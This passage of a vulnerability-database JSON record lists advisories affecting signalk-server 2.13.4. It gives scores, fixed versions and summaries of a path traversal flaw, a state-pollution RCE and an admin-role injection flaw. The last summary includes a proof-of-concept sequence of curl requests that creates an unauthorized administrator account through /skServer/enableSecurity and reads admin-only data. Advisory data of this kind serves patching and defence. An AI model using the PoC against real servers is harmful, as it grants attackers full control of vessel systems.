                            "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-01-02T18:55:48Z/"
                        }
                    ],
                    "url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-fpf5-w967-rr2m"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/73159?format=api",
                    "purl": "pkg:npm/signalk-server@2.19.0",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-2e2f-qt4n-dqa7"
                        },
                        {
                            "vulnerability": "VCID-3s8j-v31f-pyaf"
                        },
                        {
                            "vulnerability": "VCID-jq2a-wxb1-dufm"
                        },
                        {
                            "vulnerability": "VCID-ndfm-uuf3-nbfg"
                        },
                        {
                            "vulnerability": "VCID-v11p-jkzw-vkar"
                        },
                        {
                            "vulnerability": "VCID-xvyj-f4ps-kycx"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/signalk-server@2.19.0"
                }
            ],
            "aliases": [
                "CVE-2025-68273",
                "GHSA-fpf5-w967-rr2m"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-p96m-n138-a7c6"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49921?format=api",
            "vulnerability_id": "VCID-v11p-jkzw-vkar",
            "summary": "SignalK Server has Path Traversal leading to information disclosure\nA Path Traversal vulnerability in SignalK Server's `applicationData` API allows authenticated users on Windows systems to read, write, and list arbitrary files and directories on the filesystem. The `validateAppId()` function blocks forward slashes (`/`) but not backslashes (`\\`), which are treated as directory separators by `path.join()` on Windows. This enables attackers to escape the intended `applicationData` directory.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25228",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.0002",
                            "scoring_system": "epss",
                            "scoring_elements": "0.05796",
                            "published_at": "2026-06-08T12:55:00Z"
                        },
                        {
                            "value": "0.0002",
                            "scoring_system": "epss",
                            "scoring_elements": "0.05841",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.0002",
                            "scoring_system": "epss",
                            "scoring_elements": "0.05839",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.0002",
                            "scoring_system": "epss",
                            "scoring_elements": "0.05848",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25228"
                },
                {
                    "reference_url": "https://github.com/SignalK/signalk-server",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.0",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/SignalK/signalk-server"
                },
                {
                    "reference_url": "https://github.com/SignalK/signalk-server/commit/9bcf61c8fe2cb8a40998b913a02fb64dff9e86c7",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"
                        },
                        {
                            "value": "5.0",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-04T21:09:33Z/"
                        }
                    ],
                    "url": "https://github.com/SignalK/signalk-server/commit/9bcf61c8fe2cb8a40998b913a02fb64dff9e86c7"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25228",
                    "reference_id": "CVE-2026-25228",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.0",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25228"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-vrhw-v2hw-jffx",
                    "reference_id": "GHSA-vrhw-v2hw-jffx",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-vrhw-v2hw-jffx"
                },
                {
                    "reference_url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-vrhw-v2hw-jffx",
                    "reference_id": "GHSA-vrhw-v2hw-jffx",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"
                        },
                        {
                            "value": "5.0",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-04T21:09:33Z/"
                        }
                    ],
                    "url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-vrhw-v2hw-jffx"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/73776?format=api",
                    "purl": "pkg:npm/signalk-server@2.20.3",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-2e2f-qt4n-dqa7"
                        },
                        {
                            "vulnerability": "VCID-3s8j-v31f-pyaf"
                        },
                        {
                            "vulnerability": "VCID-jq2a-wxb1-dufm"
                        },
                        {
                            "vulnerability": "VCID-ndfm-uuf3-nbfg"
                        },
                        {
                            "vulnerability": "VCID-veqf-x77b-4bf7"
                        },
                        {
                            "vulnerability": "VCID-xvyj-f4ps-kycx"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/signalk-server@2.20.3"
                }
            ],
            "aliases": [
                "CVE-2026-25228",
                "GHSA-vrhw-v2hw-jffx"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-v11p-jkzw-vkar"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89977?format=api",
            "vulnerability_id": "VCID-xvyj-f4ps-kycx",
            "summary": "Signal K Server: Privilege Escalation by Admin Role Injection via /enableSecurity\n## Summary\n\nAccording to SignalK's security documentation, when a server is first initialized without security enabled, the **/skServer/enableSecurity** endpoint is intentionally exposed to allow the owner to set up the initial admin account. This initial open access is by design.\n\nHowever, the critical vulnerability is that this route is never deregistered or disabled after the initial successful setup. Even after the genuine administrator has created their account, restarted the server, and activated token security, the **/skServer/enableSecurity** route remains perpetually open.\n\nFurthermore, the endpoint explicitly trusts the **type** field provided in the request body, passing it directly into the server's security configuration without validation. Because the route remains permanently listening, any unauthenticated user can call this endpoint at any time to silently inject a new, fully privileged admin account alongside the legitimate ones.\n\n## Vulnerable Root Cause \n\nFile:  src/serverroutes.ts (Lines 685-754)\n```\nif (app.securityStrategy.getUsers(getSecurityConfig(app)).length === 0) {\n    app.post(\n      `${SERVERROUTESPREFIX}/enableSecurity`,\n      (req: Request, res: Response) => {\n        // ...\n        function addUser(request: Request, response: Response, securityStrategy: SecurityStrategy, config?: any) {\n          // [!VULNERABLE] Passes the entire JSON request body directly to the security strategy\n          securityStrategy.addUser(config, request.body, (err, theConfig) => {\n            // ...\n          })\n        }\n      }\n    // ... 
No code disables or removes this route after first execution.\n    // The conditional check on Line 685 only happens during server startup, so once the route is registered it stays mounted for the lifetime of the process.\n```\n\nFile: src/tokensecurity.ts (Lines 980-994)\n```\nfunction addUser(\n    theConfig: SecurityConfig,\n    user: { userId: string; type: string; password?: string },\n    callback: ICallback<SecurityConfig>\n  ): void {\n    // ...\n    const newUser: User = {\n      username: user.userId,\n      type: user.type // [!VULNERABLE] Blindly trusts the injected \"type\" field\n    }\n```\n\n## Proof of Concept (PoC)\n\n**Simulate Legitimate Initial Setup**: Send a POST request to the open enableSecurity route defining the initial legitimate admin account.\n```\ncurl -X POST http://localhost:3000/skServer/enableSecurity \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\"userId\": \"admin\", \"password\": \"securepassword\", \"type\": \"admin\"}'\n\nResult: Security enabled\n```\n\n**Inject Malicious Admin**: Send the exact same request again to create a second, unauthorized admin account. 
This should ideally be blocked because security was already enabled.\n\n```\ncurl -X POST http://localhost:3000/skServer/enableSecurity \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\"userId\": \"attacker\", \"password\": \"password123\", \"type\": \"admin\"}'\n\nResult: Security enabled (The vulnerability: The server fails to reject the request and creates the second admin).\n```\n\n**Verify Both Admins Exist**: Login via JWT as the attacker and query the restricted users endpoint.\n\n```\n# Get Token for Attacker\nTOKEN=$(curl -s -X POST http://localhost:3000/signalk/v1/auth/login \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\"username\": \"attacker\", \"password\": \"password123\"}' | jq -r .token)\n```\n```\n# Access Admin-Only Data\ncurl -H \"Authorization: Bearer $TOKEN\" http://localhost:3000/skServer/security/users\nResult: The system returns both admin and attacker as active Administrators.\n```\n\n<img width=\"1205\" height=\"469\" alt=\"Screenshot 2026-03-24 145906\" src=\"https://github.com/user-attachments/assets/98855e54-cb78-4786-a9e3-63dcc1bed37a\" />\n\n## Security Impact\nAn unauthenticated attacker can gain full Administrator access to the SignalK server at any time, allowing them to modify sensitive vessel routing data, alter server configurations, and access restricted endpoints",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33950",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00031",
                            "scoring_system": "epss",
                            "scoring_elements": "0.09318",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00031",
                            "scoring_system": "epss",
                            "scoring_elements": "0.09243",
                            "published_at": "2026-06-08T12:55:00Z"
                        },
                        {
                            "value": "0.00031",
                            "scoring_system": "epss",
                            "scoring_elements": "0.09301",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00031",
                            "scoring_system": "epss",
                            "scoring_elements": "0.09299",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33950"
                },
                {
                    "reference_url": "https://github.com/SignalK/signalk-server",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/SignalK/signalk-server"
                },
                {
                    "reference_url": "https://github.com/SignalK/signalk-server/releases/tag/v2.24.0-beta.4",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-03T18:00:30Z/"
                        }
                    ],
                    "url": "https://github.com/SignalK/signalk-server/releases/tag/v2.24.0-beta.4"
                },
                {
                    "reference_url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-x8hc-fqv3-7gwf",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-03T18:00:30Z/"
                        }
                    ],
                    "url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-x8hc-fqv3-7gwf"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33950",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33950"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-x8hc-fqv3-7gwf",
                    "reference_id": "GHSA-x8hc-fqv3-7gwf",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-x8hc-fqv3-7gwf"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/111230?format=api",
                    "purl": "pkg:npm/signalk-server@2.24.0-beta.4",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-2e2f-qt4n-dqa7"
                        },
                        {
                            "vulnerability": "VCID-jq2a-wxb1-dufm"
                        },
                        {
                            "vulnerability": "VCID-ndfm-uuf3-nbfg"
                        },
                        {
                            "vulnerability": "VCID-veqf-x77b-4bf7"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/signalk-server@2.24.0-beta.4"
                }
            ],
            "aliases": [
                "CVE-2026-33950",
                "GHSA-x8hc-fqv3-7gwf"
            ],
            "risk_score": 4.5,
            "exploitability": "0.5",
            "weighted_severity": "9.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-xvyj-f4ps-kycx"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49553?format=api",
            "vulnerability_id": "VCID-yktb-859h-y7hs",
            "summary": "Signal K Server has Unauthenticated State Pollution leading to Remote Code Execution (RCE)\nAn unauthenticated attacker can pollute the internal state (`restoreFilePath`) of the server via the `/skServer/validateBackup` endpoint. This allows the attacker to hijack the administrator's \"Restore\" functionality to overwrite critical server configuration files (e.g., `security.json`, `package.json`), leading to account takeover and Remote Code Execution (RCE). The attacker only plants the poisoned path; the overwrite itself happens when an administrator later triggers a restore, which is why the CVSS vector carries UI:R despite PR:N.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66398",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00139",
                            "scoring_system": "epss",
                            "scoring_elements": "0.33634",
                            "published_at": "2026-06-08T12:55:00Z"
                        },
                        {
                            "value": "0.00139",
                            "scoring_system": "epss",
                            "scoring_elements": "0.33669",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00139",
                            "scoring_system": "epss",
                            "scoring_elements": "0.33703",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00139",
                            "scoring_system": "epss",
                            "scoring_elements": "0.33689",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66398"
                },
                {
                    "reference_url": "https://github.com/SignalK/signalk-server",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/SignalK/signalk-server"
                },
                {
                    "reference_url": "https://github.com/SignalK/signalk-server/commit/5c211eaf33f0ccadbaed6720264780d92afbd7f8",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/SignalK/signalk-server/commit/5c211eaf33f0ccadbaed6720264780d92afbd7f8"
                },
                {
                    "reference_url": "https://github.com/SignalK/signalk-server/releases/tag/v2.19.0",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-01-05T21:00:27Z/"
                        }
                    ],
                    "url": "https://github.com/SignalK/signalk-server/releases/tag/v2.19.0"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66398",
                    "reference_id": "CVE-2025-66398",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66398"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-w3x5-7c4c-66p9",
                    "reference_id": "GHSA-w3x5-7c4c-66p9",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-w3x5-7c4c-66p9"
                },
                {
                    "reference_url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-w3x5-7c4c-66p9",
                    "reference_id": "GHSA-w3x5-7c4c-66p9",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-01-05T21:00:27Z/"
                        }
                    ],
                    "url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-w3x5-7c4c-66p9"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/73159?format=api",
                    "purl": "pkg:npm/signalk-server@2.19.0",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-2e2f-qt4n-dqa7"
                        },
                        {
                            "vulnerability": "VCID-3s8j-v31f-pyaf"
                        },
                        {
                            "vulnerability": "VCID-jq2a-wxb1-dufm"
                        },
                        {
                            "vulnerability": "VCID-ndfm-uuf3-nbfg"
                        },
                        {
                            "vulnerability": "VCID-v11p-jkzw-vkar"
                        },
                        {
                            "vulnerability": "VCID-xvyj-f4ps-kycx"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/signalk-server@2.19.0"
                }
            ],
            "aliases": [
                "CVE-2025-66398",
                "GHSA-w3x5-7c4c-66p9"
            ],
            "risk_score": 4.5,
            "exploitability": "0.5",
            "weighted_severity": "9.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-yktb-859h-y7hs"
        }
    ],
    "fixing_vulnerabilities": [],
    "risk_score": "4.5",
    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/signalk-server@2.13.4"
}